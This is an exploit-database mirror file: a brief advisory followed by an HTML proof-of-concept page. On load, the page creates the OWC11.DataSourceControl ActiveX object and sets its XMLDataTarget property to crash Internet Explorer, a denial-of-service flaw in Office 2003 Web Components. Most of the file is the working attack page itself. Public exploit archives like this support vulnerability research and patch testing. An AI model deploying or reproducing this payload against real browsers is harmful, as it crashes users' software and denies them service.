exploit-db-mirror/exploits/windows/dos/30749.html
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

22 lines
No EOL
586 B
HTML

source: https://www.securityfocus.com/bid/26405/info
Microsoft Office Web Component is prone to a denial-of-service vulnerability because of a memory access violation.
Attackers can exploit this issue to crash Internet Explorer and deny service to legitimate users.
This issue affects OWC11 for Microsoft Office 2003.
<!--
written by e.b.
-->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
var obj = new ActiveXObject("OWC11.DataSourceControl");
obj.XMLDataTarget = "A";
}
</script>
</head>
<body onload="JavaScript: return Check();" />
</html>